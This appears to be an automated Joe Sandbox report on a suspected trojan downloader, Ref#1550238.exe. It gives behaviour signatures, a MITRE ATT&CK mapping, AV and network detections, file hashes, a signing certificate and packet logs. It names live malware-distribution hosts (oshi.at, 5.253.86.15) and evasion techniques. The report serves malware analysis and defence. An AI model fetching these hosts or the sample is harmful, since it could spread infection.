Source: C:\Users\user\Desktop\Ref#1550238.exeThread delayed: delay time: 95734Jump to behavior
Source: C:\Users\user\Desktop\Ref#1550238.exeThread delayed: delay time: 95624Jump to behavior
Source: C:\Users\user\Desktop\Ref#1550238.exeThread delayed: delay time: 95491Jump to behavior
Source: C:\Users\user\Desktop\Ref#1550238.exeThread delayed: delay time: 95273Jump to behavior
Source: C:\Users\user\Desktop\Ref#1550238.exeThread delayed: delay time: 95157Jump to behavior
Source: C:\Users\user\Desktop\Ref#1550238.exeThread delayed: delay time: 95000Jump to behavior
Source: C:\Users\user\Desktop\Ref#1550238.exeThread delayed: delay time: 94890Jump to behavior
Source: C:\Users\user\Desktop\Ref#1550238.exeThread delayed: delay time: 94781Jump to behavior
Source: C:\Users\user\Desktop\Ref#1550238.exeThread delayed: delay time: 94672Jump to behavior
Source: C:\Users\user\Desktop\Ref#1550238.exeThread delayed: delay time: 94547Jump to behavior
Source: C:\Users\user\Desktop\Ref#1550238.exeThread delayed: delay time: 94437Jump to behavior
Source: C:\Users\user\Desktop\Ref#1550238.exeThread delayed: delay time: 94328Jump to behavior
Source: Ref#1550238.exe, 00000000.00000002.3741306291.0000000001465000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\Desktop\Ref#1550238.exeProcess token adjusted: DebugJump to behavior
Source: C:\Users\user\Desktop\Ref#1550238.exeMemory allocated: page read and write | page guardJump to behavior
Source: C:\Users\user\Desktop\Ref#1550238.exeQueries volume information: C:\Users\user\Desktop\Ref#1550238.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Ref#1550238.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Ref#1550238.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Ref#1550238.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Ref#1550238.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
MITRE ATT&CK matrix, one line per tactic (the number in parentheses is the report's signature count for that technique):
Reconnaissance: Gather Victim Identity Information, Credentials, Email Addresses, Employee Names, Gather Victim Network Information
Resource Development: Acquire Infrastructure, Domains, DNS Server, Virtual Private Server, Server
Initial Access: Valid Accounts, Default Accounts, Domain Accounts, Local Accounts, Cloud Accounts
Execution: Windows Management Instrumentation, Scheduled Task/Job, At, Cron, Launchd
Persistence: DLL Side-Loading (1), Boot or Logon Initialization Scripts, Logon Script (Windows), Login Hook, Network Logon Script
Privilege Escalation: DLL Side-Loading (1), Boot or Logon Initialization Scripts, Logon Script (Windows), Login Hook, Network Logon Script
Defense Evasion: Disable or Modify Tools (1), Virtualization/Sandbox Evasion (31), DLL Side-Loading (1), Binary Padding, Software Packing
Credential Access: OS Credential Dumping, LSASS Memory, Security Account Manager, NTDS, LSA Secrets
Discovery: Query Registry (1), Security Software Discovery (1), Virtualization/Sandbox Evasion (31), Application Window Discovery (1), System Information Discovery (12)
Lateral Movement: Remote Services, Remote Desktop Protocol, SMB/Windows Admin Shares, Distributed Component Object Model, SSH
Collection: Archive Collected Data (1), Data from Removable Media, Data from Network Shared Drive, Input Capture, Keylogging
Command and Control: Encrypted Channel (11), Non-Application Layer Protocol (2), Application Layer Protocol (3), Ingress Tool Transfer (1), Fallback Channels
Exfiltration: Exfiltration Over Other Network Medium, Exfiltration Over Bluetooth, Automated Exfiltration, Traffic Duplication, Scheduled Transfer
Impact: Abuse Accessibility Features, Network Denial of Service, Data Encrypted for Impact, Data Destruction, Data Encrypted for Impact
Source | Detection | Scanner | Label
Ref#1550238.exe | 45% | ReversingLabs | Win32.Trojan.Generic
Ref#1550238.exe | 100% | Joe Sandbox ML |
No Antivirus matches
No Antivirus matches
No Antivirus matches
Source | Detection | Scanner | Label
http://oshi.at | 0% | Avira URL Cloud | safe
https://oshi.at/EqqP | 0% | Avira URL Cloud | safe
https://oshi.at | 0% | Avira URL Cloud | safe
http://oshi.atd | 0% | Avira URL Cloud | safe
https://oshi.atD | 0% | Avira URL Cloud | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
oshi.at | 5.253.86.15 | true | false | | unknown
Name | Malicious | Antivirus Detection | Reputation
https://oshi.at/EqqP | false | Avira URL Cloud: safe | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://crls.ssl.com/SSLcom-SubCA-EV-CodeSigning-RSA-4096-R3.crl0 | Ref#1550238.exe | false | | high
http://oshi.atd | Ref#1550238.exe, 00000000.00000002.3741808265.0000000003349000.00000004.00000800.00020000.00000000.sdmp, Ref#1550238.exe, 00000000.00000002.3741808265.00000000033C0000.00000004.00000800.00020000.00000000.sdmp, Ref#1550238.exe, 00000000.00000002.3741808265.000000000337E000.00000004.00000800.00020000.00000000.sdmp, Ref#1550238.exe, 00000000.00000002.3741808265.000000000329C000.00000004.00000800.00020000.00000000.sdmp, Ref#1550238.exe, 00000000.00000002.3741808265.000000000336C000.00000004.00000800.00020000.00000000.sdmp, Ref#1550238.exe, 00000000.00000002.3741808265.00000000033AE000.00000004.00000800.00020000.00000000.sdmp, Ref#1550238.exe, 00000000.00000002.3741808265.00000000032ED000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://crl.m | Ref#1550238.exe, 00000000.00000002.3743212803.0000000006E6F000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://crls.ssl.com/ssl.com-rsa-RootCA.crl0 | Ref#1550238.exe | false | | high
http://crls.ssl.com/SSL.com-timeStamping-I-RSA-R1.crl0 | Ref#1550238.exe | false | | high
http://oshi.at | Ref#1550238.exe, 00000000.00000002.3741808265.0000000003349000.00000004.00000800.00020000.00000000.sdmp, Ref#1550238.exe, 00000000.00000002.3741808265.00000000033C0000.00000004.00000800.00020000.00000000.sdmp, Ref#1550238.exe, 00000000.00000002.3741808265.000000000337E000.00000004.00000800.00020000.00000000.sdmp, Ref#1550238.exe, 00000000.00000002.3741808265.000000000329C000.00000004.00000800.00020000.00000000.sdmp, Ref#1550238.exe, 00000000.00000002.3741808265.000000000336C000.00000004.00000800.00020000.00000000.sdmp, Ref#1550238.exe, 00000000.00000002.3741808265.00000000033AE000.00000004.00000800.00020000.00000000.sdmp, Ref#1550238.exe, 00000000.00000002.3741808265.00000000032ED000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.ssl.com/repository0 | Ref#1550238.exe | false | | high
http://ocsps.ssl.com0? | Ref#1550238.exe | false | | high
http://ocsps.ssl.com0_ | Ref#1550238.exe | false | | high
http://www.ssl.com/repository/SSLcomRootCertificationAuthorityRSA.crt0 | Ref#1550238.exe | false | | high
https://oshi.at | Ref#1550238.exe, 00000000.00000002.3741808265.0000000003285000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://cert.ssl.com/SSL.com-timeStamping-I-RSA-R1.cer0Q | Ref#1550238.exe | false | | high
http://ocsps.ssl.com0 | Ref#1550238.exe | false | | high
http://cert.ssl.com/SSLcom-SubCA-EV-CodeSigning-RSA-4096-R3.cer0 | Ref#1550238.exe | false | | high
http://crls.ssl.com/SSLcom-RootCA-EV-RSA-4096-R2.crl0 | Ref#1550238.exe | false | | high
https://oshi.atD | Ref#1550238.exe, 00000000.00000002.3741808265.00000000032D4000.00000004.00000800.00020000.00000000.sdmp, Ref#1550238.exe, 00000000.00000002.3741808265.0000000003349000.00000004.00000800.00020000.00000000.sdmp, Ref#1550238.exe, 00000000.00000002.3741808265.00000000033C0000.00000004.00000800.00020000.00000000.sdmp, Ref#1550238.exe, 00000000.00000002.3741808265.000000000337E000.00000004.00000800.00020000.00000000.sdmp, Ref#1550238.exe, 00000000.00000002.3741808265.000000000336C000.00000004.00000800.00020000.00000000.sdmp, Ref#1550238.exe, 00000000.00000002.3741808265.00000000033AE000.00000004.00000800.00020000.00000000.sdmp, Ref#1550238.exe, 00000000.00000002.3741808265.00000000032ED000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | Ref#1550238.exe, 00000000.00000002.3741808265.0000000003285000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.ssl.com/repository/SSLcom-RootCA-EV-RSA-4096-R2.crt0 | Ref#1550238.exe | false | | high
IP | Domain | Country | ASN | ASN Name | Malicious
5.253.86.15 | oshi.at | Cyprus | 208046 | HOSTSLICK-GERMANYNL | false
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1567423
Start date and time: 2024-12-03 15:07:22 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 6m 44s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 8
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: Ref#1550238.exe
Detection: MAL
Classification: mal56.winEXE@1/0@1/1
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 95%
• Number of executed functions: 16
• Number of non-executed functions: 6
Cookbook Comments:
• Found application associated with file extension: .exe
• Override analysis time to 240000 for current running targets taking high CPU consumption
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
• Excluded domains from analysis (whitelisted): ocsps.ssl.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed; the report is missing behavior information
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtReadVirtualMemory calls found.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• VT rate limit hit for: Ref#1550238.exe
Time | Type | Description
09:08:20 | API Interceptor | 10683206x Sleep call for process: Ref#1550238.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name
5.253.86.15 | JuneOrder.exe | malicious | AsyncRAT, Babadeda, PureLog Stealer, zgRAT
5.253.86.15 | TamenuV11.msi | malicious | Unknown
5.253.86.15 | 9K25QyJ4hA.exe | malicious | Unknown
5.253.86.15 | 9K25QyJ4hA.exe | malicious | Unknown
5.253.86.15 | PAYMENT_RECEIPT_STAN100699.exe | malicious | Unknown
5.253.86.15 | PAYMENT_RECEIPT_STAN100699.exe | malicious | Unknown
5.253.86.15 | VGuSHbkIxk.exe | malicious | Amadey, Djvu, Fabookie, RedLine, SmokeLoader
5.253.86.15 | wauCcRjr6j.exe | malicious | Djvu, RedLine, SmokeLoader
5.253.86.15 | KvVXVfYvlF.exe | malicious | BlackGuard, SmokeLoader
5.253.86.15 | BHHh.exe | malicious | Unknown
Match | Associated Sample Name / URL | Detection | Threat Name | Context
oshi.at | Swift Payment MT103.lnk | malicious | Unknown | 188.241.120.6
oshi.at | Facturation.exe | malicious | Doenerium | 188.241.120.6
oshi.at | Facturation.exe | malicious | Doenerium | 188.241.120.6
oshi.at | KyrazonSetup.exe | malicious | Unknown | 194.15.112.248
oshi.at | KyrazonSetup.exe | malicious | Unknown | 194.15.112.248
oshi.at | JuneOrder.exe | malicious | AsyncRAT, Babadeda, PureLog Stealer, zgRAT | 5.253.86.15
oshi.at | Order._1.exe | malicious | AsyncRAT, Babadeda, PureLog Stealer, zgRAT | 194.15.112.248
oshi.at | jdconstructnOrderfdp..exe | malicious | Babadeda, PureLog Stealer, Quasar, zgRAT | 188.241.120.6
oshi.at | TamenuV11.msi | malicious | Unknown | 5.253.86.15
oshi.at | Setup 3.0.0.msi | malicious | Unknown | 188.241.120.6
Match | Associated Sample Name / URL | Detection | Threat Name | Context
HOSTSLICK-GERMANYNL | an_api.exe | malicious | Unknown | 193.142.146.64
HOSTSLICK-GERMANYNL | licarisan_api.exe | malicious | Icarus | 193.142.146.64
HOSTSLICK-GERMANYNL | an_api.exe | malicious | Unknown | 193.142.146.64
HOSTSLICK-GERMANYNL | build.exe | malicious | Unknown | 193.142.146.64
HOSTSLICK-GERMANYNL | ub16vsLP6y.zip | malicious | Remcos | 193.142.146.203
HOSTSLICK-GERMANYNL | ISehgzqm2V.zip | malicious | Remcos | 193.142.146.203
HOSTSLICK-GERMANYNL | Form-8879_PDF.jar | malicious | Unknown | 193.142.146.64
HOSTSLICK-GERMANYNL | Form-8879_PDF.jar | malicious | Unknown | 193.142.146.64
HOSTSLICK-GERMANYNL | bot_library.exe | malicious | Unknown | 193.142.146.43
HOSTSLICK-GERMANYNL | SecuriteInfo.com.ELF.Mirai-CQT.17542.12898.elf | malicious | Mirai | 193.142.146.10
Match | Associated Sample Name / URL | Detection | Threat Name | Context
3b5074b1b5d032e5620f69f9f700ff0e | Bestellung - 021224 - 901003637.exe | malicious | Quasar | 5.253.86.15
3b5074b1b5d032e5620f69f9f700ff0e | Teklif Talebi- #U0130hale 14990_xlsx.exe | malicious | Snake Keylogger, VIP Keylogger | 5.253.86.15
3b5074b1b5d032e5620f69f9f700ff0e | NEW90FL0OtSHAz.bat.exe | malicious | Snake Keylogger, VIP Keylogger | 5.253.86.15
3b5074b1b5d032e5620f69f9f700ff0e | 1099833039444.pdf.js | malicious | Remcos | 5.253.86.15
3b5074b1b5d032e5620f69f9f700ff0e | https://nam05.safelinks.protection.outlook.com.url.atp-redirect.protected-forms.com/XTnQrajg1OGVHZkdSZC9jY09NbW40Z2plNHVuWDhsQVZRZkFYNVBxOWlTekFXSXBLSVRWLyt2WXhuS1hGNVo3UUxGQTRLRVpXNHpLSjVKdDEvbHJLSmtFWjMzbFIxb3IvR2xvdWJ1em5yeTJBK1FXdzF3UG52YXBaVmJBSEJZcXBSdjFvMTh6TmplRHV4azZ6UHkrTnM5dUY2QmVzbVFVRWk5di9PMEZxZ2lXNnM5N2tuOExqN1pyUy0tcEx5Q0xXTTBEOURyNFdnTS0tTTJJM3JGT2w2ZzQxTnorb2NMd1lrZz09?cid=2305347406 | malicious | KnowBe4 | 5.253.86.15
3b5074b1b5d032e5620f69f9f700ff0e | kjsdhf243kj2.bat | malicious | Abobus Obfuscator, Braodo | 5.253.86.15
3b5074b1b5d032e5620f69f9f700ff0e | kjsdfhsdHndf.bat | malicious | Abobus Obfuscator, Braodo | 5.253.86.15
3b5074b1b5d032e5620f69f9f700ff0e | hkjsdhf01.bat | malicious | Abobus Obfuscator, Braodo | 5.253.86.15
3b5074b1b5d032e5620f69f9f700ff0e | kjshdfj_ksdf02.bat | malicious | Abobus Obfuscator, Braodo | 5.253.86.15
                                                    No context
                                                    No created / dropped files found
File type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit): 5.691852920088672
TrID:
• Win32 Executable (generic) Net Framework (10011505/4) 50.01%
• Win32 Executable (generic) a (10002005/4) 49.97%
• Generic Win/DOS Executable (2004/3) 0.01%
• DOS Executable Generic (2002/1) 0.01%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: Ref#1550238.exe
File size: 348'128 bytes
MD5: a31bcf203bb60f13de83211ac9d44d06
SHA1: 8d559c68b94f38e6886f467080cbce53a2ae1654
SHA256: bd35a1c3b410026617e27fa3937f77f1a42ada6978afc36022e75c63677f897d
SHA512: 6404465ccf7dcbc3bcd985e68034f5c8cbc926db719397d05b3af50f9e5554cb1757080038ea7d26b451aed8c90f7d83894c1984995fff6f87bc077ad56a3b50
SSDEEP: 3072:BbS0IEhKUQfHCj32o7wewfHHQoz5f8o/8Ck0cTIHXrrCbJSZ862M:9SYIWtw4W8y8cc03rObgSM
TLSH: F174840BF7C1D4D6DD407BB2F4974911A3A0EDC23A9FCE06295633D82D733A7698618A
                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....-Ng.............................=... ...@....@.. ....................................`................................
Icon Hash: b04a484c4c4a4eb0
Entrypoint: 0x443dee
Entrypoint Section: .text
Digitally signed: true
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp: 0x674E2DDC [Mon Dec 2 21:59:56 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 4
OS Version Minor: 0
File Version Major: 4
File Version Minor: 0
Subsystem Version Major: 4
Subsystem Version Minor: 0
Import Hash: f34d5f2d4577ed6d9ceec516c1f5a744
Signature Valid: false
Signature Issuer: CN=SSL.com EV Code Signing Intermediate CA RSA R3, O=SSL Corp, L=Houston, S=Texas, C=US
Signature Validation Error: The digital signature of the object did not verify
Error Number: -2146869232
Not Before, Not After:
• 04/07/2024 00:35:32, 15/05/2027 11:15:04
Subject Chain:
• OID.1.3.6.1.4.1.311.60.2.1.3=VN, OID.2.5.4.15=Private Organization, CN="DUC FABULOUS CO.,LTD", SERIALNUMBER=0105838409, O="DUC FABULOUS CO.,LTD", L=Hanoi, C=VN
Version: 3
Thumbprint MD5: FF0E889D2A73C3A679605952D35452DC
Thumbprint SHA-1: 2C1D12F8BBE0827400A8440AF74FFFA8DCC8097C
Thumbprint SHA-256: A73352D67693AA16BCE2F182B15891F0F23EA0485CC18938686AAFDEE7B743E3
Serial: 6DD2E3173995F51BFAC1D9FB4CB200C1
                                                    Instruction
                                                    jmp dword ptr [00402000h]
                                                     Name | Virtual Address | Virtual Size | Is in Section
                                                     IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                                     IMAGE_DIRECTORY_ENTRY_IMPORT | 0x43da0 | 0x4b | .text
                                                     IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x44000 | 0x10e28 | .rsrc
                                                     IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                                     IMAGE_DIRECTORY_ENTRY_SECURITY | 0x53200 | 0x1de0 |
                                                     IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x56000 | 0xc | .reloc
                                                     IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                                                     IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                                     IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                                     IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                                     IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                                     IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                                     IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
                                                     IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                                     IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
                                                     IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                                                     Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                                     .text | 0x2000 | 0x41df4 | 0x41e00 | 102d06c84424e63954a39ec2819e6137 | False | 0.3905175225332068 | data | 5.67905571766169 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                     .rsrc | 0x44000 | 0x10e28 | 0x11000 | f610e0855d271b56b7174997eb33bf0b | False | 0.055893841911764705 | data | 4.109331107170668 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                     .reloc | 0x56000 | 0xc | 0x200 | f840735ffb5cd866dbd5b914a57abacd | False | 0.044921875 | data | 0.10191042566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                     Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                                                     RT_ICON | 0x44130 | 0x10828 | Device independent bitmap graphic, 128 x 256 x 32, image size 67584 | | | 0.046492369572932686
                                                     RT_GROUP_ICON | 0x54958 | 0x14 | data | | | 1.15
                                                     RT_VERSION | 0x5496c | 0x308 | data | | | 0.4497422680412371
                                                     RT_MANIFEST | 0x54c74 | 0x1b4 | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (433), with no line terminators | | | 0.5642201834862385
                                                     DLL | Import
                                                     mscoree.dll | _CorExeMain
                                                     Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
                                                     2024-12-03T15:10:03.156977+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.7 | 49896 | 5.253.86.15 | 443 | TCP
                                                     2024-12-03T15:10:08.451556+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.7 | 49927 | 5.253.86.15 | 443 | TCP
                                                     2024-12-03T15:10:20.407125+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.7 | 49938 | 5.253.86.15 | 443 | TCP
                                                     2024-12-03T15:10:28.874317+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.7 | 49965 | 5.253.86.15 | 443 | TCP
                                                     2024-12-03T15:10:48.327359+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.7 | 49983 | 5.253.86.15 | 443 | TCP
                                                     2024-12-03T15:10:59.577294+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.7 | 49985 | 5.253.86.15 | 443 | TCP
                                                     2024-12-03T15:11:15.124157+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.7 | 49986 | 5.253.86.15 | 443 | TCP
                                                     2024-12-03T15:11:35.999128+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.7 | 49989 | 5.253.86.15 | 443 | TCP
                                                     2024-12-03T15:11:53.124045+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.7 | 49990 | 5.253.86.15 | 443 | TCP
                                                     2024-12-03T15:12:08.833318+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.7 | 49993 | 5.253.86.15 | 443 | TCP
                                                     2024-12-03T15:12:13.530479+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.7 | 49994 | 5.253.86.15 | 443 | TCP
                                                     2024-12-03T15:12:24.397233+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.7 | 49995 | 5.253.86.15 | 443 | TCP
                                                    Dec 3, 2024 15:11:16.139334917 CET443499885.253.86.15192.168.2.7
                                                    Dec 3, 2024 15:11:16.946110964 CET443499875.253.86.15192.168.2.7
                                                    Dec 3, 2024 15:11:16.946208954 CET49987443192.168.2.75.253.86.15
                                                    Dec 3, 2024 15:11:16.946208954 CET49987443192.168.2.75.253.86.15
                                                    Dec 3, 2024 15:11:17.105771065 CET443499885.253.86.15192.168.2.7
                                                    Dec 3, 2024 15:11:17.105844021 CET49988443192.168.2.75.253.86.15
                                                    Dec 3, 2024 15:11:17.105866909 CET49988443192.168.2.75.253.86.15
                                                    Dec 3, 2024 15:11:17.863450050 CET443499895.253.86.15192.168.2.7
                                                    Dec 3, 2024 15:11:17.863528013 CET49989443192.168.2.75.253.86.15
                                                    Dec 3, 2024 15:11:17.896455050 CET49989443192.168.2.75.253.86.15
                                                    Dec 3, 2024 15:11:17.896472931 CET443499895.253.86.15192.168.2.7
                                                    Dec 3, 2024 15:11:17.896775007 CET443499895.253.86.15192.168.2.7
                                                    Dec 3, 2024 15:11:17.898576975 CET49989443192.168.2.75.253.86.15
                                                    Dec 3, 2024 15:11:17.943322897 CET443499895.253.86.15192.168.2.7
                                                    Dec 3, 2024 15:11:35.998723984 CET49989443192.168.2.75.253.86.15
                                                    Dec 3, 2024 15:11:35.998846054 CET443499895.253.86.15192.168.2.7
                                                    Dec 3, 2024 15:11:35.998924017 CET49989443192.168.2.75.253.86.15
                                                    Dec 3, 2024 15:11:36.000942945 CET49990443192.168.2.75.253.86.15
                                                    Dec 3, 2024 15:11:36.001025915 CET443499905.253.86.15192.168.2.7
                                                    Dec 3, 2024 15:11:36.001097918 CET49990443192.168.2.75.253.86.15
                                                    Dec 3, 2024 15:11:36.001976967 CET49990443192.168.2.75.253.86.15
                                                    Dec 3, 2024 15:11:36.002000093 CET443499905.253.86.15192.168.2.7
                                                    Dec 3, 2024 15:11:37.975857973 CET443499905.253.86.15192.168.2.7
                                                    Dec 3, 2024 15:11:37.975944996 CET49990443192.168.2.75.253.86.15
                                                    Dec 3, 2024 15:11:37.978506088 CET49990443192.168.2.75.253.86.15
                                                    Dec 3, 2024 15:11:37.978518009 CET443499905.253.86.15192.168.2.7
                                                    Dec 3, 2024 15:11:37.978760004 CET443499905.253.86.15192.168.2.7
                                                    Dec 3, 2024 15:11:37.980297089 CET49990443192.168.2.75.253.86.15
                                                    Dec 3, 2024 15:11:38.023332119 CET443499905.253.86.15192.168.2.7
                                                    Dec 3, 2024 15:11:53.123704910 CET49990443192.168.2.75.253.86.15
                                                    Dec 3, 2024 15:11:53.123820066 CET443499905.253.86.15192.168.2.7
                                                    Dec 3, 2024 15:11:53.123872995 CET49990443192.168.2.75.253.86.15
                                                    Dec 3, 2024 15:11:53.126821995 CET49991443192.168.2.75.253.86.15
                                                    Dec 3, 2024 15:11:53.126867056 CET443499915.253.86.15192.168.2.7
                                                    Dec 3, 2024 15:11:53.126928091 CET49991443192.168.2.75.253.86.15
                                                    Dec 3, 2024 15:11:53.127439022 CET49991443192.168.2.75.253.86.15
                                                    Dec 3, 2024 15:11:53.127449036 CET443499915.253.86.15192.168.2.7
                                                    Dec 3, 2024 15:11:53.170258045 CET49991443192.168.2.75.253.86.15
                                                    Dec 3, 2024 15:11:53.172163963 CET49992443192.168.2.75.253.86.15
                                                    Dec 3, 2024 15:11:53.172221899 CET443499925.253.86.15192.168.2.7
                                                    Dec 3, 2024 15:11:53.172281981 CET49992443192.168.2.75.253.86.15
                                                    Dec 3, 2024 15:11:53.172854900 CET49992443192.168.2.75.253.86.15
                                                    Dec 3, 2024 15:11:53.172872066 CET443499925.253.86.15192.168.2.7
                                                    Dec 3, 2024 15:11:53.215338945 CET443499915.253.86.15192.168.2.7
                                                    Dec 3, 2024 15:11:53.748929024 CET49992443192.168.2.75.253.86.15
                                                    Dec 3, 2024 15:11:53.751224041 CET49993443192.168.2.75.253.86.15
                                                    Dec 3, 2024 15:11:53.751302004 CET443499935.253.86.15192.168.2.7
                                                    Dec 3, 2024 15:11:53.751379013 CET49993443192.168.2.75.253.86.15
                                                    Dec 3, 2024 15:11:53.751765966 CET49993443192.168.2.75.253.86.15
                                                    Dec 3, 2024 15:11:53.751777887 CET443499935.253.86.15192.168.2.7
                                                    Dec 3, 2024 15:11:53.795336008 CET443499925.253.86.15192.168.2.7
                                                    Dec 3, 2024 15:11:54.948640108 CET443499915.253.86.15192.168.2.7
                                                    Dec 3, 2024 15:11:54.948751926 CET49991443192.168.2.75.253.86.15
                                                    Dec 3, 2024 15:11:54.948751926 CET49991443192.168.2.75.253.86.15
                                                    Dec 3, 2024 15:11:55.054188013 CET443499925.253.86.15192.168.2.7
                                                    Dec 3, 2024 15:11:55.054296017 CET49992443192.168.2.75.253.86.15
                                                    Dec 3, 2024 15:11:55.054296017 CET49992443192.168.2.75.253.86.15
                                                    Dec 3, 2024 15:11:55.571523905 CET443499935.253.86.15192.168.2.7
                                                    Dec 3, 2024 15:11:55.571595907 CET49993443192.168.2.75.253.86.15
                                                    Dec 3, 2024 15:11:55.574101925 CET49993443192.168.2.75.253.86.15
                                                    Dec 3, 2024 15:11:55.574116945 CET443499935.253.86.15192.168.2.7
                                                    Dec 3, 2024 15:11:55.574385881 CET443499935.253.86.15192.168.2.7
                                                    Dec 3, 2024 15:11:55.576091051 CET49993443192.168.2.75.253.86.15
                                                    Dec 3, 2024 15:11:55.623322010 CET443499935.253.86.15192.168.2.7
                                                    Dec 3, 2024 15:12:08.826769114 CET49993443192.168.2.75.253.86.15
                                                    Dec 3, 2024 15:12:08.826881886 CET443499935.253.86.15192.168.2.7
                                                    Dec 3, 2024 15:12:08.827080965 CET49993443192.168.2.75.253.86.15
                                                    Dec 3, 2024 15:12:08.828175068 CET49994443192.168.2.75.253.86.15
                                                    Dec 3, 2024 15:12:08.828224897 CET443499945.253.86.15192.168.2.7
                                                    Dec 3, 2024 15:12:08.828382015 CET49994443192.168.2.75.253.86.15
                                                    Dec 3, 2024 15:12:08.828789949 CET49994443192.168.2.75.253.86.15
                                                    Dec 3, 2024 15:12:08.828800917 CET443499945.253.86.15192.168.2.7
